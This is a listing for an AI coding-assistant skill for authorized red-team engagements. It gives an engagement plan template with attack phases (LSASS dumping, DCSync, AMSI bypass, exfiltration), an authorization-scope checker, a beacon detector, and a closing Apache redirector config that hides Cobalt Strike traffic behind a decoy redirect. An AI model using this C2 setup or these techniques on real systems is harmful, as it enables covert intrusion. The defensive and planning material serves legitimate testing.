ClaudeWave

Red Team Operations & Engagement Planning

Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting

Install in Claude Code
git clone --depth 1 https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill /tmp/red-team-operations-engagement-planning && cp -r /tmp/red-team-operations-engagement-planning/skills/14-red-team-ops ~/.claude/skills/red-team-operations-engagement-planning
Then start a new Claude Code session; the skill loads automatically.

SKILL.md

# Red Team Operations & Engagement Planning

## Purpose

Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.

> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it.
>
> **Authorized contexts:**
> - Signed Statement of Work (SOW) or Rules of Engagement (ROE)
> - Bug bounty program (confirm target is in-scope)
> - Internal security testing (confirm organizational authority)
> - CTF competition (confirm challenge platform and scope)
> - Research in owned/isolated lab environment

---

## Activation Triggers

This skill activates when the user asks about:
- Planning a red team engagement or adversary simulation
- Designing C2 infrastructure (redirectors, team servers, C2 profiles)
- Active Directory attack paths (BloodHound, Kerberoasting, DCSync)
- Lateral movement techniques for authorized engagements
- Persistence mechanisms in red team context
- Social engineering campaign planning (authorized)
- Red team reporting and executive presentations
- Tabletop exercises (TTX) design
- Purple team collaboration
- OPSEC planning for authorized operations

---

## Prerequisites

```bash
pip install pyyaml requests
```

**Tools for authorized operations:**
- `Cobalt Strike / Sliver / Havoc` — C2 frameworks
- `Metasploit` — Exploitation framework
- `BloodHound / SharpHound` — AD attack path analysis
- `Impacket` — Network protocol tools
- `CrackMapExec / NetExec` — AD enumeration
- `Responder` — LLMNR/NBT-NS poisoning
- `Mimikatz` — Credential access (Windows)

---

## Authorization Verification

**Before any operational planning, Claude asks:**

```
Red team assistance requires authorization confirmation:

1. What is the engagement type?
   □ External penetration test
   □ Internal network assessment
   □ Red team / adversary simulation
   □ Social engineering assessment
   □ Physical security assessment
   □ CTF competition

2. What is your authorization basis?
   □ Signed SOW / contract with target organization
   □ Internal role (IT/Security team testing own systems)
   □ Bug bounty — [program name]
   □ CTF — [platform and challenge name]

3. What is the defined scope?
   (IP ranges, domains, systems, excluded assets)

4. Who is the target organization's security point of contact?
   (For deconfliction — required for IR-level engagements)

Confirm before proceeding. Operational assistance without confirmed
authorization cannot be provided.
```

---

## Core Capabilities

### 1. Engagement Planning

**When the user asks to plan a red team engagement:**

**Engagement Planning Framework:**

```markdown
# Red Team Engagement Plan
**Client:** [Organization Name]
**Engagement Type:** [Full Red Team / CRTO / APT Simulation]
**Start Date:** [Date]
**End Date:** [Date]
**Rules of Engagement Version:** 1.0

## Objectives
- Primary: [e.g., Test detection and response capabilities against APT29 TTPs]
- Secondary: [e.g., Identify privilege escalation paths to Domain Admin]
- Out of Scope: [e.g., Production databases, payment systems, physical access]

## Threat Profile
**Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile]
**Initial Access Vector:** [Spearphishing / Supply chain / Watering hole]
**Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]

## Attack Kill Chain Phases
1. Reconnaissance → OSINT, subdomain enum (Skill 01)
2. Initial Access → Phishing / external vuln exploitation
3. Execution → PowerShell / LOLBins / custom implant
4. Persistence → Registry / service / scheduled task
5. Privilege Escalation → Local privesc → Domain Admin
6. Defense Evasion → Process injection / AMSI bypass
7. Credential Access → LSASS / Kerberoasting / DCSync
8. Lateral Movement → PSExec / WMI / RDP
9. Collection → Identify critical data
10. Exfiltration → Staged transfer to simulated C2

## Rules of Engagement
- Testing hours: [24x7 / Business hours only / Agreed windows]
- Destructive testing: [Prohibited / Limited / Authorized]
- DoS testing: [Prohibited]
- Social engineering: [Authorized / Prohibited / Phishing only]
- Physical access: [Prohibited / Badge cloning only]
- Deconfliction: Call [POC Name] at [Phone] if critical systems impacted

## Emergency Abort Procedure
If critical systems are impacted unexpectedly:
1. Immediately cease all operations
2. Call [POC] at [Phone] — available 24/7
3. Document what was done and when
4. Stand down until authorized to resume
```

**Engagement Planning Script:**
```bash
python scripts/engagement_planner.py --scope scope.json --output plan.md
```
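
The authorization questionnaire above and the planning script it feeds are the gate the skill insists on; the following is an added example that turns that gate into a check a planner can run before any tooling is pointed at a host. It is not the skill's own `scripts/engagement_planner.py` (whose `scope.json` layout is not shown on the page), so the document shape, the field names and the sample values are assumptions, and the client, POC and address ranges are constructed placeholders. It refuses to proceed until authorization basis, point of contact, testing window and scope are present, and it classifies each candidate target with exclusions winning over inclusions.

```python
"""Authorization gate and scope checker for engagement planning.

Added example; not the skill's scripts/engagement_planner.py. The scope
document shape below is an assumption, and every value in it is a
constructed placeholder.
"""
import ipaddress
from datetime import date

# Constructed sample scope document (placeholder client, POC and ranges).
SAMPLE_SCOPE = {
    "client": "Example Corp",
    "engagement_type": "Internal network assessment",
    "authorization": {"basis": "Signed SOW", "reference": "SOW-PLACEHOLDER"},
    "poc": {"name": "Security POC placeholder", "phone": "+1-555-0100"},
    "window": {"start": "2025-01-06", "end": "2025-01-17"},
    "in_scope": ["10.10.0.0/16", "203.0.113.0/24", "*.corp.example"],
    "excluded": ["10.10.5.0/24", "payments.corp.example"],
}

# Fields the authorization questionnaire requires before any planning.
REQUIRED_FIELDS = [
    ("client",), ("engagement_type",),
    ("authorization", "basis"), ("authorization", "reference"),
    ("poc", "name"), ("poc", "phone"),
    ("window", "start"), ("window", "end"),
    ("in_scope",),
]


def _lookup(doc, path):
    """Walk a nested dict along path; None if any key is missing."""
    for key in path:
        if not isinstance(doc, dict) or key not in doc:
            return None
        doc = doc[key]
    return doc


def validate_scope(scope, today=None):
    """Return a list of gate failures; an empty list means planning may proceed."""
    problems = [
        "missing " + ".".join(path)
        for path in REQUIRED_FIELDS
        if _lookup(scope, path) in (None, "", [])
    ]
    if problems:
        return problems
    start = date.fromisoformat(scope["window"]["start"])
    end = date.fromisoformat(scope["window"]["end"])
    today = today or date.today()
    if end < start:
        problems.append("testing window ends before it starts")
    elif not start <= today <= end:
        problems.append(f"{today} is outside the testing window {start}..{end}")
    return problems


def _as_network(entry):
    """Parse a CIDR block or single address; None for hostnames and wildcards."""
    try:
        return ipaddress.ip_network(entry, strict=False)
    except ValueError:
        return None


def _matches(entry, target):
    """True if target (an IP or a hostname) is covered by one scope entry."""
    net = _as_network(entry)
    if net is not None:
        try:
            return ipaddress.ip_address(target) in net
        except ValueError:
            return False  # a hostname never matches an address entry
    entry, target = entry.lower(), target.lower()
    if entry.startswith("*."):  # wildcard covers the domain and all subdomains
        return target == entry[2:] or target.endswith(entry[1:])
    return target == entry


def target_status(scope, target):
    """'excluded', 'in_scope' or 'out_of_scope'; exclusions always win."""
    if any(_matches(e, target) for e in scope.get("excluded", [])):
        return "excluded"
    if any(_matches(e, target) for e in scope["in_scope"]):
        return "in_scope"
    return "out_of_scope"


if __name__ == "__main__":
    gate = validate_scope(SAMPLE_SCOPE, today=date(2025, 1, 10))
    print("gate:", "PASS" if not gate else gate)
    for host in ["10.10.9.7", "10.10.5.7", "mail.corp.example", "192.0.2.1"]:
        print(f"{host:22} {target_status(SAMPLE_SCOPE, host)}")
```

The exclusion-first ordering is deliberate: an excluded subnet inside an in-scope /16, or an excluded host under an in-scope wildcard domain, must come back `excluded` rather than `in_scope`, which is exactly the "payment systems" case the plan template lists as out of scope.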

### 2. C2 Infrastructure Design

**When the user asks about C2 infrastructure for authorized operations:**

**Multi-Tier C2 Architecture:**

```
[Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon]
                                    → [Redirector 2 (DNS)]   ← → [Beacon]
                                    → [Backup Redirector]
```

**Infrastructure Components:**

1. **Team Server** — Never directly exposed to internet; VPN access only
2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic
3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive)
4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert

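The components above (cloud redirectors, a categorized aged domain, a valid certificate, HTTPS as the primary channel) are all chosen so that the channel is indistinguishable from ordinary web traffic at the content level. For the purple-team side of such an engagement, the property that a check-in loop cannot hide well is its timing, so the following added example (not part of the skill) flags client/host pairs in a proxy log whose request spacing is too regular. The log format, host names and addresses are constructed for the example; the thresholds are assumptions to be tuned against the environment's own baseline.

```python
"""Beacon periodicity detector over web proxy logs.

Added purple-team example, not part of the skill. It groups requests by
(client, host) and measures how regular the gaps between requests are:
a sleep-plus-jitter loop keeps the coefficient of variation small, while
human browsing produces bursts and long idle periods.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log (invented hosts and addresses). Assumed format:
# <ISO-8601 UTC timestamp> <client ip> <method> <host> <uri> <status>
SAMPLE_LOG = """\
2025-01-10T09:00:00Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:01:02Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:01:58Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:03:01Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:03:59Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:05:03Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:05:57Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:07:00Z 10.10.3.42 GET updates.cdn-example.net /api/v1/check 200
2025-01-10T09:00:05Z 10.10.3.77 GET news.example.org / 200
2025-01-10T09:00:06Z 10.10.3.77 GET news.example.org /css/site.css 200
2025-01-10T09:00:06Z 10.10.3.77 GET news.example.org /js/app.js 200
2025-01-10T09:04:40Z 10.10.3.77 GET news.example.org /story/123 200
2025-01-10T09:04:41Z 10.10.3.77 GET news.example.org /img/hero.jpg 200
2025-01-10T09:21:13Z 10.10.3.77 GET news.example.org /story/456 200
2025-01-10T09:21:14Z 10.10.3.77 GET news.example.org /img/b.jpg 200
2025-01-10T09:21:14Z 10.10.3.77 GET news.example.org /img/c.jpg 200
"""


def parse_log(text):
    """Yield (timestamp, client, host, uri) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, _method, host, uri, _status = parts
        try:
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        except ValueError:
            continue
        yield when, client, host, uri


def find_beacons(text, min_requests=6, max_cv=0.2):
    """Flag (client, host) pairs whose inter-request gaps are suspiciously regular.

    cv = pstdev(gaps) / mean(gaps). Thresholds are assumptions: min_requests
    avoids scoring short conversations, max_cv bounds the accepted jitter.
    """
    sessions = defaultdict(list)
    for when, client, host, uri in parse_log(text):
        sessions[(client, host)].append((when, uri))

    hits = []
    for (client, host), events in sessions.items():
        if len(events) < min_requests:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({
                "client": client,
                "host": host,
                "requests": len(events),
                "mean_interval_s": round(mean, 1),
                "cv": round(cv, 3),
                # a single repeated URI is a second weak signal worth surfacing
                "distinct_uris": len({uri for _, uri in events}),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

In the constructed log the first client checks in every 60 seconds with a few seconds of jitter and is flagged, while the second client's bursty browsing of the same kind of host is not. In a real deployment the same computation runs per day over the proxy's own export, and the output is a triage list for the blue team to deconflict against the engagement's declared infrastructure, not a verdict.
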
**Redirector Setup (Apache mod_rewrite):**
```apache
# Redirect only Cobalt Strike beacon traffic to team server
# Everything else → sends to legitimate domain (blend in)
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*"
RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$"
RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L]
# Decoy redi
RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L]